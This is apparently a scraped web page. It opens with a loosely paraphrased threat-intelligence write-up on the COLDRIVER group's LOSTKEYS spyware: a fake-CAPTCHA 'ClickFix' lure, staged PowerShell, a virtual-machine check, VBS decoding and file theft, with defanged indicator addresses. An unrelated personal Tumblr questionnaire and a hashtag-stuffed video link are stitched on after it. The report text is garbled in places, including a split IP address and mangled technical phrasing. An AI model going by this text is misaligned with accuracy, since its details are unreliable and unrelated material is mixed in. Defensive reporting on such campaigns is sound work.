UNC4057 LOSTKEYS Malware Targets Western NGOs

UNC4057 LOSTKEYS

The Russian government-backed outfit COLDRIVER targets Western and non-governmental organisations with its latest spyware, LOSTKEYS.

The Russian government-backed threat organisation COLDRIVER (also known as UNC4057, Star Blizzard, and Callisto) has stolen data from NGOs and Western targets using LOSTKEYS, a new virus. The Google Threat Intelligence Group (GTIG) been tracking COLDRIVER for years, including its SPICA malware in 2024, and believes LOSTKEYS is a new tool.

COLDRIVER focusses on credential phishing targeting well-known targets. People at NGO or personal email addresses are generally targeted. They steal login passwords, emails, and contact lists after gaining access to a target's account. COLDRIVER may also access system files and infect devices with malware.

COLDRIVER has attacked journalists, think institutes, NGOs, and past and current Western government and military advisors. Plus, the gang has kept targeting Ukrainians. COLDRIVER's principal goal is to acquire intelligence for Russia's strategic goals. In several cases, the gang hacked and leaked NGO and UK official data.

January, March, and April 2025 saw the discovery of LOSTKEYS malware. The malicious application may take files from a hard-coded set of folders and extensions and transmit the attacker system details and active processes. COLDRIVER normally utilises credentials to access contacts and emails, although they have utilised SPICA to access target system documents. LOSTKEYS has a unique purpose and is utilised in certain scenarios.

The multi-step LOSTKEYS infection chain begins with a tempting website featuring a fake CAPTCHA. After the CAPTCHA is “verified,” the PowerShell code is transferred to the user's clipboard and the page invites them to execute it using Windows' “run” prompt. The “ClickFix” approach includes socially engineering targets to copy, paste, and run PowerShell scripts. Google Threat Intelligence Group said many APT and financially driven attackers use this method, which has been well documented.

PowerShell does the first stage's second step. In numerous instances, the IP address 165.227.148[.] provided this second step.68. The second step computes the display resolution MD5 hash and stops execution if it matches one of three specified values. This step may avoid virtual machine execution. The request must contain IDs unique to each observed instance of this chain to proceed. In every observation, the third stage comes from the same host as the previous phases.

Base64-encoded blobs decode into additional PowerShell in the third phase. This step requires retrieving and decoding the latest LOSTKEYS payload. It does this by downloading two additional files from the same host using different identities for each infection chain. The first-downloaded Visual Basic Script (VBS) file decodes the second file. Each infection chain is decoded with two keys. One unique key is in the decoder script, while stage 3 saves the second. Keys are used to replace cypher the encoded data.

The final payload is LOSTKEYS VBS. File theft and system data collection are its purposes.

Two more LOSTKEYS samples dated December 2023 were uncovered during this behaviour investigation. These previous PE files posing as Maltego files change greatly from the execution chain starting in 2025. It is unclear if these December 2023 samples are related to COLDRIVER or if the malware was reused from another operation into January 2025. Exchanged Indicators of Compromise (IOCs) include binary hashes and C2 addresses like njala[.]dev and 80.66.88[.]67.

Google Threat Intelligence Group uses threat actor research like COLDRIVER to improve product security and safety to safeguard consumers. Once detected, hazardous websites, domains, and files are added to Safe Browsing to protect users. Government-backed attacker warnings alerted Gmail and Workspace users. Potential targets should enrol in Google's Advanced Protection Program, enable Chrome's Enhanced Safe Browsing, and update all devices.

Google shares its findings with the security community to raise awareness and help targeted companies and people. Sharing methods and approaches improves threat hunting and sector user protections. The original post comprises YARA rules and compromise indicators and is available as a Google Threat Intelligence collection and rule bundle.

my fav attack ive done every day for the first week of art fight ! — @dykeseesgod / irlMADSCIENTIST / @visualbasicscript + estate / dykeseesgod again / rolo / @tinytoniichka / @ratsbypaulzindel

(everyone credited as their tumblr or art fight username)

tagged by @petoskeystones and @thedissociatives tysm ! :]

last song: this modern love by bloc party

currently watching: my friends and i are in a terror rewatch phase but i’m also slowly picking my way through criminal minds s11

last movie i watched: ‘one life’, the film about nicholas winton and the children he saved from then czechoslovakia in 1938 !

sweet/spicy/savoury: hmm. i do like savoury but i’m partial to sweet things every now n then

relationship status: i have a partner :]

current obsession: the terror / franklin expedition for sure but i am trying to get back into the rhythm of hockey too

last thing i googled: i think it was the website that shows my uni timetable LOL classes start tomorrow and i’m really looking forward to it !!

tagging @legobrickcow @solipseismic @visualbasicscript but no pressure ofc !

5 of the Worst Computer Viruses Ever Michael Aranda explains five of the wo... #hugochamber #aranda #bot-net #coder #computer #drive-bydownload #education #green #hacker #hank #iloveyou #macro #malicious #man-in-the-browser #masterbootrecord #mebroot #melissa #michael #programmers #science #scishow #socialengineering #stormworm #torpig #virus #viruses #visualbasicscript #worm Source: https://hugochamber.org/5-of-the-worst-computer-viruses-ever/?feed_id=10963&_unique_id=5f2f7aa17f641